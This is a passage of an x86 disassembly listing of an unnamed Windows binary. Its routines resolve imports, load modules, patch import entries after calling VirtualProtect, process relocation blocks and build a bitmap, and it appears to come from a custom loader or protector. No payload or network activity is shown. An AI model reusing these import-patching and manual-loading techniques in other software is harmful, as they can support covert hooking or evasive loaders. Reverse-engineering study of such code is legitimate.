cmp [ebp+var_20], eax
ja short loc_4D5245
mov edx, [ebp+var_44]
mov eax, [edx+24h]
and eax, 10000000h
test eax, eax
jz short loc_4D5243
push 0
push 0
push 0
push 0
call ds:dword_4E1778 ; RaiseException
loc_4D5243: ; CODE XREF: sub_4D50D0+163�j
jmp short loc_4D5247
; ---------------------------------------------------------------------------
loc_4D5245: ; CODE XREF: sub_4D50D0+140�j
; sub_4D50D0+154�j
jmp short loc_4D51D2
; ---------------------------------------------------------------------------
loc_4D5247: ; CODE XREF: sub_4D50D0+F7�j
; sub_4D50D0+117�j ...
mov [ebp+var_4], 0
jmp short loc_4D526E
; ---------------------------------------------------------------------------
loc_4D5250: ; DATA XREF: _5:004DE470�o
mov ecx, [ebp+var_14]
mov edx, [ecx]
mov eax, [edx]
mov [ebp+var_58], eax
mov eax, [ebp+var_58]
neg eax
sbb eax, eax
neg eax
retn
; ---------------------------------------------------------------------------
loc_4D5264: ; DATA XREF: _5:004DE474�o
mov esp, [ebp+var_18]
mov [ebp+var_4], 0
loc_4D526E: ; CODE XREF: sub_4D50D0+17E�j
mov ecx, [ebp+var_38]
mov eax, [ecx+84h]
xor edx, edx
mov ecx, 14h
div ecx
mov [ebp+var_1C], eax
mov [ebp+var_3C], 0
jmp short loc_4D5295
; ---------------------------------------------------------------------------
loc_4D528C: ; CODE XREF: sub_4D50D0:loc_4D536C�j
mov edx, [ebp+var_3C]
add edx, 1
mov [ebp+var_3C], edx
loc_4D5295: ; CODE XREF: sub_4D50D0+1BA�j
mov eax, [ebp+var_3C]
cmp eax, [ebp+var_1C]
jnb loc_4D5371
mov ecx, [ebp+var_3C]
imul ecx, 14h
mov edx, [ebp+var_20]
mov eax, [ebp+var_34]
add eax, [edx+ecx+0Ch]
mov [ebp+var_50], eax
mov ecx, [ebp+var_3C]
imul ecx, 14h
mov edx, [ebp+var_20]
cmp dword ptr [edx+ecx+0Ch], 0
jz short loc_4D52DD
mov eax, [ebp+var_3C]
imul eax, 14h
mov ecx, [ebp+var_20]
mov edx, [ecx+eax+0Ch]
mov eax, [ebp+var_34]
xor ecx, ecx
mov cl, [eax+edx]
test ecx, ecx
jnz short loc_4D52E2
loc_4D52DD: ; CODE XREF: sub_4D50D0+1F2�j
jmp loc_4D5371
; ---------------------------------------------------------------------------
loc_4D52E2: ; CODE XREF: sub_4D50D0+20B�j
mov edx, [ebp+var_3C]
imul edx, 14h
mov eax, [ebp+var_20]
mov ecx, [ebp+var_34]
add ecx, [eax+edx+10h]
mov [ebp+var_48], ecx
mov edx, [ebp+var_50]
push edx
call sub_4DAF8C
mov [ebp+var_4C], eax
mov eax, [ebp+var_50]
mov ds:off_4E0BE8, eax
cmp [ebp+var_4C], 0
jz short loc_4D5323
mov ecx, [ebp+arg_8]
push ecx
lea edx, [ebp+var_2C]
push edx
mov eax, [ebp+var_4C]
push eax
call sub_4D50D0
add esp, 0Ch
loc_4D5323: ; CODE XREF: sub_4D50D0+23D�j
push 0
call ds:dword_4E1718 ; GetModuleHandleA
cmp eax, [ebp+arg_0]
jz short loc_4D536C
mov ecx, [ebp+var_4C]
push ecx
mov ecx, ds:dword_4E60D8
call sub_4DB871
test eax, eax
jz short loc_4D536C
jmp short loc_4D534E
; ---------------------------------------------------------------------------
loc_4D5345: ; CODE XREF: sub_4D50D0+29A�j
mov edx, [ebp+var_48]
add edx, 4
mov [ebp+var_48], edx
loc_4D534E: ; CODE XREF: sub_4D50D0+273�j
mov eax, [ebp+var_48]
cmp dword ptr [eax], 0
jz short loc_4D536C
mov ecx, [ebp+var_50]
push ecx
mov edx, [ebp+var_24]
push edx
mov eax, [ebp+var_48]
push eax
call sub_4D53D0
add esp, 0Ch
jmp short loc_4D5345
; ---------------------------------------------------------------------------
loc_4D536C: ; CODE XREF: sub_4D50D0+25E�j
; sub_4D50D0+271�j ...
jmp loc_4D528C
; ---------------------------------------------------------------------------
loc_4D5371: ; CODE XREF: sub_4D50D0+B4�j
; sub_4D50D0+1CB�j ...
push 1
mov ecx, [ebp+arg_0]
push ecx
mov ecx, [ebp+arg_8]
call sub_4DB98E
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_4D53A5
; ---------------------------------------------------------------------------
mov edx, [ebp+var_14]
mov eax, [edx]
mov ecx, [eax]
mov [ebp+var_54], ecx
mov eax, [ebp+var_54]
neg eax
sbb eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
mov [ebp+var_4], 0FFFFFFFFh
loc_4D53A5: ; CODE XREF: sub_4D50D0+2B6�j
mov eax, [ebp+var_24]
mov ds:off_4E0BE8, eax
mov ecx, ds:dword_4E1914
sub ecx, 1
mov ds:dword_4E1914, ecx
loc_4D53BC: ; CODE XREF: sub_4D50D0+2C�j
; sub_4D50D0+5E�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4D50D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D53D0 proc near ; CODE XREF: sub_4D4AB0+282�p
; sub_4D50D0+292�p
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_4], 0
cmp ds:dword_4E60D4, 0
jnz short loc_4D53F0
mov ecx, 0EF00000Ah
call sub_4D8342
loc_4D53F0: ; CODE XREF: sub_4D53D0+14�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
push ecx
mov ecx, ds:dword_4E60D4
call sub_4DB871
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_4D544F
lea edx, [ebp+var_10]
push edx
push 4
push 4
mov eax, [ebp+arg_0]
push eax
call ds:dword_4E17AC ; VirtualProtect
test eax, eax
jnz short loc_4D542A
mov ecx, 0EF00000Bh
call sub_4D8342
loc_4D542A: ; CODE XREF: sub_4D53D0+4E�j
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
mov eax, [edx]
mov [ecx], eax
lea ecx, [ebp+var_C]
push ecx
mov edx, [ebp+var_10]
push edx
push 4
mov eax, [ebp+arg_0]
push eax
call ds:dword_4E17AC ; VirtualProtect
mov [ebp+var_4], 1
loc_4D544F: ; CODE XREF: sub_4D53D0+38�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_4D53D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D5456 proc near ; CODE XREF: sub_4CC3F3+23�p
; sub_4CF036+A5�p
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = byte ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = byte ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_26 = dword ptr -26h
var_1E = dword ptr -1Eh
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DE478
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 6Ch
push ebx
push esi
push edi
and [ebp+var_30], 0
and [ebp+var_2C], 0
and [ebp+var_4], 0
and [ebp+var_3C], 0
lea eax, [ebp+var_34]
push eax
push 0
lea eax, [ebp+var_3C]
push eax
push 0Eh
lea eax, [ebp+var_28]
push eax
push [ebp+arg_0]
call sub_4D1177
test eax, eax
jz short loc_4D54B7
lea eax, [ebp+var_44]
push eax
push [ebp+arg_0]
call sub_4D0672
test eax, eax
jnz short loc_4D54D0
loc_4D54B7: ; CODE XREF: sub_4D5456+4F�j
push 0FFFFFFFFh
and [ebp+var_64], 0
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_64]
jmp loc_4D56DC
; ---------------------------------------------------------------------------
loc_4D54D0: ; CODE XREF: sub_4D5456+5F�j
movzx eax, [ebp+var_28]
cmp eax, 4D42h
jnz short loc_4D5534
mov eax, [ebp+var_26]
cmp eax, [ebp+var_44]
ja short loc_4D5534
mov eax, [ebp+var_26]
sub eax, 0Eh
push eax
call sub_4D835A
pop ecx
mov [ebp+var_5C], eax
mov eax, [ebp+var_5C]
mov [ebp+var_30], eax
lea eax, [ebp+var_48]
push eax
push 0
lea eax, [ebp+var_3C]
push eax
mov eax, [ebp+var_26]
sub eax, 0Eh
push eax
push [ebp+var_30]
push [ebp+arg_0]
call sub_4D1177
test eax, eax
jnz short loc_4D5532
push 0FFFFFFFFh
and [ebp+var_68], 0
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_68]
jmp loc_4D56DC
; ---------------------------------------------------------------------------
loc_4D5532: ; CODE XREF: sub_4D5456+C1�j
jmp short loc_4D554D
; ---------------------------------------------------------------------------
loc_4D5534: ; CODE XREF: sub_4D5456+83�j
; sub_4D5456+8B�j
push 0FFFFFFFFh
and [ebp+var_6C], 0
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_6C]
jmp loc_4D56DC
; ---------------------------------------------------------------------------
loc_4D554D: ; CODE XREF: sub_4D5456:loc_4D5532�j
mov eax, [ebp+var_30]
mov eax, [eax]
mov [ebp+var_38], eax
mov eax, [ebp+var_30]
cmp dword ptr [eax+10h], 0
jz short loc_4D5577
push 0FFFFFFFFh
and [ebp+var_70], 0
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_70]
jmp loc_4D56DC
; ---------------------------------------------------------------------------
loc_4D5577: ; CODE XREF: sub_4D5456+106�j
push 0
call ds:dword_4E17E0 ; CreateCompatibleDC
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0
jnz short loc_4D55A1
push 0FFFFFFFFh
and [ebp+var_74], 0
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_74]
jmp loc_4D56DC
; ---------------------------------------------------------------------------
loc_4D55A1: ; CODE XREF: sub_4D5456+130�j
mov eax, [ebp+var_1E]
mov ecx, [ebp+var_30]
lea eax, [ecx+eax-0Eh]
mov [ebp+var_40], eax
and [ebp+var_4C], 0
and [ebp+var_54], 0
mov eax, [ebp+var_30]
movzx eax, word ptr [eax+0Eh]
mov [ebp+var_78], eax
cmp [ebp+var_78], 8
jz short loc_4D55F5
cmp [ebp+var_78], 10h
jz short loc_4D55EC
cmp [ebp+var_78], 18h
jz short loc_4D55E3
cmp [ebp+var_78], 20h
jz short loc_4D55DA
jmp short loc_4D55FE
; ---------------------------------------------------------------------------
loc_4D55DA: ; CODE XREF: sub_4D5456+180�j
mov [ebp+var_4C], 4
jmp short loc_4D5617
; ---------------------------------------------------------------------------
loc_4D55E3: ; CODE XREF: sub_4D5456+17A�j
mov [ebp+var_4C], 3
jmp short loc_4D5617
; ---------------------------------------------------------------------------
loc_4D55EC: ; CODE XREF: sub_4D5456+174�j
mov [ebp+var_4C], 2
jmp short loc_4D5617
; ---------------------------------------------------------------------------
loc_4D55F5: ; CODE XREF: sub_4D5456+16E�j
mov [ebp+var_4C], 1
jmp short loc_4D5617
; ---------------------------------------------------------------------------
loc_4D55FE: ; CODE XREF: sub_4D5456+182�j
push 0FFFFFFFFh
and [ebp+var_7C], 0
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_7C]
jmp loc_4D56DC
; ---------------------------------------------------------------------------
loc_4D5617: ; CODE XREF: sub_4D5456+18B�j
; sub_4D5456+194�j ...
push 0
push 0
lea eax, [ebp+var_58]
push eax
push 0
push [ebp+var_30]
push [ebp+var_2C]
call ds:dword_4E17E4 ; CreateDIBSection
mov [ebp+var_54], eax
cmp [ebp+var_54], 0
jnz short loc_4D564F
push 0FFFFFFFFh
and [ebp+var_80], 0
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_80]
jmp loc_4D56DC
; ---------------------------------------------------------------------------
loc_4D564F: ; CODE XREF: sub_4D5456+1DE�j
mov eax, [ebp+var_30]
mov eax, [eax+4]
imul eax, [ebp+var_4C]
mov [ebp+var_50], eax
mov eax, [ebp+var_50]
cdq
push 4
pop ecx
idiv ecx
test edx, edx
jz short loc_4D567F
mov eax, [ebp+var_50]
cdq
push 4
pop ecx
idiv ecx
push 4
pop eax
sub eax, edx
mov ecx, [ebp+var_50]
add ecx, eax
mov [ebp+var_50], ecx
loc_4D567F: ; CODE XREF: sub_4D5456+211�j
mov eax, [ebp+var_30]
mov ecx, [ebp+var_50]
imul ecx, [eax+8]
mov esi, [ebp+var_40]
mov edi, [ebp+var_58]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 0FFFFFFFFh
mov eax, [ebp+var_54]
mov [ebp+var_84], eax
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_84]
jmp short loc_4D56DC
; ---------------------------------------------------------------------------
loc_4D56BB: ; DATA XREF: _5:004DE480�o
cmp [ebp+var_2C], 0
jz short loc_4D56CA
push [ebp+var_2C]
call ds:dword_4E17E8 ; DeleteDC
loc_4D56CA: ; CODE XREF: sub_4D5456+269�j
mov eax, [ebp+var_30]
mov [ebp+var_60], eax
push [ebp+var_60]
call sub_4D83DD
pop ecx
retn
; ---------------------------------------------------------------------------
xor eax, eax
loc_4D56DC: ; CODE XREF: sub_4D5456+75�j
; sub_4D5456+D7�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_4D5456 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D56EB proc near ; CODE XREF: sub_4D61E1+969�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
push 0
push [ebp+arg_0]
call sub_4D92CA
pop ecx
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov [ebp+var_8], eax
jmp short loc_4D570F
; ---------------------------------------------------------------------------
loc_4D5708: ; CODE XREF: sub_4D56EB+40�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_4D570F: ; CODE XREF: sub_4D56EB+1B�j
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_4D572D
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
push eax
call sub_4CC86E
pop ecx
mov ecx, [ebp+var_8]
mov [ecx], al
jmp short loc_4D5708
; ---------------------------------------------------------------------------
loc_4D572D: ; CODE XREF: sub_4D56EB+2C�j
push 0Ch
call sub_4D835A
pop ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_4]
mov [eax+4], ecx
mov eax, [ebp+var_C]
mov ecx, [ebp+var_4]
mov [eax], ecx
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_8]
mov [eax+8], ecx
mov eax, [ebp+var_C]
leave
retn
sub_4D56EB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D575D proc near ; CODE XREF: sub_4D4AB0+9F�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
push 0
push [ebp+arg_4]
call sub_4D92CA
pop ecx
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov [ebp+var_8], eax
jmp short loc_4D5781
; ---------------------------------------------------------------------------
loc_4D577A: ; CODE XREF: sub_4D575D+40�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_4D5781: ; CODE XREF: sub_4D575D+1B�j
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_4D579F
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
push eax
call sub_4CC86E
pop ecx
mov ecx, [ebp+var_8]
mov [ecx], al
jmp short loc_4D577A
; ---------------------------------------------------------------------------
loc_4D579F: ; CODE XREF: sub_4D575D+2C�j
; sub_4D575D:loc_4D5818�j
cmp [ebp+arg_0], 0
jz short loc_4D581A
mov eax, [ebp+arg_0]
mov [ebp+var_C], eax
mov eax, [ebp+arg_0]
mov eax, [eax+8]
mov [ebp+arg_0], eax
mov eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_C]
mov eax, [eax]
mov [ebp+var_14], eax
loc_4D57C2: ; CODE XREF: sub_4D575D+97�j
mov eax, [ebp+var_14]
mov al, [eax]
mov [ebp+var_15], al
mov ecx, [ebp+var_10]
cmp al, [ecx]
jnz short loc_4D57FC
cmp [ebp+var_15], 0
jz short loc_4D57F6
mov eax, [ebp+var_14]
mov al, [eax+1]
mov [ebp+var_16], al
mov ecx, [ebp+var_10]
cmp al, [ecx+1]
jnz short loc_4D57FC
add [ebp+var_14], 2
add [ebp+var_10], 2
cmp [ebp+var_16], 0
jnz short loc_4D57C2
loc_4D57F6: ; CODE XREF: sub_4D575D+78�j
and [ebp+var_1C], 0
jmp short loc_4D5804
; ---------------------------------------------------------------------------
loc_4D57FC: ; CODE XREF: sub_4D575D+72�j
; sub_4D575D+89�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
mov [ebp+var_1C], eax
loc_4D5804: ; CODE XREF: sub_4D575D+9D�j
mov eax, [ebp+var_1C]
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jnz short loc_4D5818
mov eax, [ebp+var_C]
mov eax, [eax+4]
jmp short locret_4D581C
; ---------------------------------------------------------------------------
loc_4D5818: ; CODE XREF: sub_4D575D+B1�j
jmp short loc_4D579F
; ---------------------------------------------------------------------------
loc_4D581A: ; CODE XREF: sub_4D575D+46�j
xor eax, eax
locret_4D581C: ; CODE XREF: sub_4D575D+B9�j
leave
retn
sub_4D575D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D581E proc near ; CODE XREF: sub_4D58CF+86�p
; sub_4D61E1+D8�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
and [ebp+var_8], 0
and [ebp+var_4], 0
movzx eax, ds:byte_4E1694
test eax, eax
jnz short loc_4D587C
push offset dword_4E0C88
lea edx, [ebp+var_4]
mov ecx, [ebp+arg_0]
call sub_4D1AE2
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_4D5863
push offset dword_4E0C88
lea edx, [ebp+var_4]
mov ecx, [ebp+arg_0]
call sub_4D19D2
mov [ebp+var_8], eax
loc_4D5863: ; CODE XREF: sub_4D581E+30�j
cmp [ebp+var_8], 0
jnz short loc_4D587C
mov eax, [ebp+var_4]
mov [ebp+var_C], eax
push [ebp+var_C]
call sub_4D83DD
pop ecx
and [ebp+var_4], 0
loc_4D587C: ; CODE XREF: sub_4D581E+17�j
; sub_4D581E+49�j
cmp [ebp+arg_4], 0
jz short loc_4D588C
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov [eax], ecx
jmp short loc_4D589B
; ---------------------------------------------------------------------------
loc_4D588C: ; CODE XREF: sub_4D581E+62�j
mov eax, [ebp+var_4]
mov [ebp+var_10], eax
push [ebp+var_10]
call sub_4D83DD
pop ecx
loc_4D589B: ; CODE XREF: sub_4D581E+6C�j
mov eax, [ebp+var_8]
leave
retn
sub_4D581E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D58A0 proc near ; CODE XREF: sub_4D5BD7+41�p
; sub_4D5BD7+37C�p ...
push ebp
mov ebp, esp
cmp ds:dword_4E195C, 0
jnz short loc_4D58C2
push offset aKernel32_dll ; "kernel32.dll"
push offset aGetcurrentpr_0 ; "GetCurrentProcessId"
call sub_4D9C22
pop ecx
pop ecx
mov ds:dword_4E195C, eax
loc_4D58C2: ; CODE XREF: sub_4D58A0+A�j
call ds:dword_4E195C
xor eax, 0CABEFA10h
pop ebp
retn
sub_4D58A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D58CF proc near ; CODE XREF: sub_4D5AD2+C�p
; sub_4DAF8C+2B�p
var_34 = byte ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 34h
mov [ebp+var_34], dl
mov [ebp+var_30], ecx
push offset sub_4DBB0D
push ds:dword_4E17C0
push [ebp+var_30]
mov ecx, ds:dword_4E1954
call sub_4DB891
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_4D594E
movzx eax, [ebp+var_34]
test eax, eax
jz short loc_4D5946
push 400h
call sub_4D835A
pop ecx
mov [ebp+var_1C], eax
mov eax, [ebp+var_1C]
mov [ebp+var_10], eax
push 400h
push [ebp+var_10]
push [ebp+var_C]
call ds:dword_4E1714 ; GetModuleFileNameA
test eax, eax
jz short loc_4D5937
push [ebp+var_10]
call ds:dword_4E175C ; LoadLibraryA
loc_4D5937: ; CODE XREF: sub_4D58CF+5D�j
mov eax, [ebp+var_10]
mov [ebp+var_20], eax
push [ebp+var_20]
call sub_4D83DD
pop ecx
loc_4D5946: ; CODE XREF: sub_4D58CF+34�j
mov eax, [ebp+var_C]
jmp locret_4D5A3F
; ---------------------------------------------------------------------------
loc_4D594E: ; CODE XREF: sub_4D58CF+2C�j
push 0
push 0
push [ebp+var_30]
call sub_4D581E
add esp, 0Ch
mov [ebp+var_8], eax
and [ebp+var_4], 0
cmp [ebp+var_8], 0
jz short loc_4D59B3
push 0
push 0
push [ebp+var_8]
call sub_4D8892
add esp, 0Ch
mov [ebp+var_14], eax
push [ebp+var_14]
call ds:dword_4E1718 ; GetModuleHandleA
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_4D599F
movzx eax, [ebp+var_34]
test eax, eax
jz short loc_4D599F
push [ebp+var_14]
call ds:dword_4E175C ; LoadLibraryA
loc_4D599F: ; CODE XREF: sub_4D58CF+BD�j
; sub_4D58CF+C5�j
mov eax, [ebp+var_14]
mov [ebp+var_24], eax
push [ebp+var_24]
call sub_4D83DD
pop ecx
jmp loc_4D5A3C
; ---------------------------------------------------------------------------
loc_4D59B3: ; CODE XREF: sub_4D58CF+99�j
push [ebp+var_30]
call ds:dword_4E1718 ; GetModuleHandleA
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_4D5A3C
movzx eax, [ebp+var_34]
test eax, eax
jz short loc_4D5A3C
push 400h
call sub_4D835A
pop ecx
mov [ebp+var_28], eax
mov eax, [ebp+var_28]
mov [ebp+var_18], eax
push 400h
push [ebp+var_18]
push [ebp+var_4]
call ds:dword_4E1714 ; GetModuleFileNameA
test eax, eax
jz short loc_4D59FF
push [ebp+var_18]
call ds:dword_4E175C ; LoadLibraryA
loc_4D59FF: ; CODE XREF: sub_4D58CF+125�j
mov eax, [ebp+var_18]
mov [ebp+var_2C], eax
push [ebp+var_2C]
call sub_4D83DD
pop ecx
push [ebp+var_30]
push [ebp+var_4]
call sub_4D5070
test eax, eax
jnz short loc_4D5A3C
call ds:dword_4E1710 ; RtlGetLastWin32Error
test eax, eax
jnz short loc_4D5A2F
push 7Eh
call ds:dword_4E178C ; RtlRestoreLastWin32Error
loc_4D5A2F: ; CODE XREF: sub_4D58CF+156�j
push [ebp+var_4]
call ds:dword_4E16E0 ; FreeLibrary
and [ebp+var_4], 0
loc_4D5A3C: ; CODE XREF: sub_4D58CF+DF�j
; sub_4D58CF+F4�j ...
mov eax, [ebp+var_4]
locret_4D5A3F: ; CODE XREF: sub_4D58CF+7A�j
leave
retn
sub_4D58CF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D5A41 proc near ; CODE XREF: sub_4DB076+4E�p
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004D5AC3 SIZE 0000000F BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DE488
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 10h
push ebx
push esi
push edi
mov [ebp+var_28], ecx
push 105h
call sub_4D835A
pop ecx
mov [ebp+var_20], eax
mov eax, [ebp+var_20]
mov [ebp+var_1C], eax
push 41h
pop ecx
xor eax, eax
mov edi, [ebp+var_1C]
rep stosd
stosb
and [ebp+var_4], 0
push 104h
push [ebp+var_1C]
push [ebp+var_28]
call ds:dword_4E1714 ; GetModuleFileNameA
push [ebp+var_1C]
push [ebp+var_28]
call sub_4D5070
or [ebp+var_4], 0FFFFFFFFh
call sub_4D5AB3
jmp short loc_4D5AC3
sub_4D5A41 endp
; =============== S U B R O U T I N E =======================================
sub_4D5AB3 proc near ; CODE XREF: sub_4D5A41+6B�p
; DATA XREF: _5:004DE490�o
mov eax, [ebp-1Ch]
mov [ebp-24h], eax
push dword ptr [ebp-24h]
call sub_4D83DD
pop ecx
retn
sub_4D5AB3 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4D5A41
loc_4D5AC3: ; CODE XREF: sub_4D5A41+70�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_4D5A41
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D5AD2 proc near ; CODE XREF: sub_4DAE2D+19�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov dl, 1
mov ecx, [ebp+var_4]
call sub_4D58CF
leave
retn
sub_4D5AD2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D5AE5 proc near ; CODE XREF: sub_4D61E1+5DB�p
; sub_4D61E1+60F�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
xor edx, edx
div [ebp+arg_4]
mov [ebp+var_4], edx
cmp [ebp+var_4], 0
jz short loc_4D5B05
mov eax, [ebp+arg_0]
add eax, [ebp+arg_4]
sub eax, [ebp+var_4]
jmp short locret_4D5B08
; ---------------------------------------------------------------------------
loc_4D5B05: ; CODE XREF: sub_4D5AE5+13�j
mov eax, [ebp+arg_0]
locret_4D5B08: ; CODE XREF: sub_4D5AE5+1E�j
leave
retn
sub_4D5AE5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D5B0A proc near ; CODE XREF: sub_4D5BD7+16C�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 24h
mov eax, [ebp+arg_0]
add eax, [ebp+arg_8]
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
add eax, [ebp+arg_8]
add eax, [ebp+arg_C]
mov [ebp+var_8], eax
loc_4D5B25: ; CODE XREF: sub_4D5B0A:loc_4D5BD0�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jnb locret_4D5BD5
mov eax, [ebp+var_4]
mov eax, [eax]
mov [ebp+var_14], eax
mov eax, [ebp+var_4]
add eax, 4
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov eax, [eax]
mov [ebp+var_10], eax
mov eax, [ebp+var_4]
add eax, 4
mov [ebp+var_4], eax
mov eax, [ebp+var_10]
sub eax, 8
mov [ebp+var_10], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
loc_4D5B65: ; CODE XREF: sub_4D5B0A+8B�j
; sub_4D5B0A+C4�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_C]
jnb short loc_4D5BD0
mov eax, [ebp+var_4]
movzx eax, word ptr [eax]
and eax, 0FFFh
mov [ebp+var_24], eax
mov eax, [ebp+var_4]
movzx eax, word ptr [eax]
sar eax, 0Ch
mov [ebp+var_1C], eax
mov eax, [ebp+var_4]
inc eax
inc eax
mov [ebp+var_4], eax
cmp [ebp+var_1C], 0
jnz short loc_4D5B97
jmp short loc_4D5B65
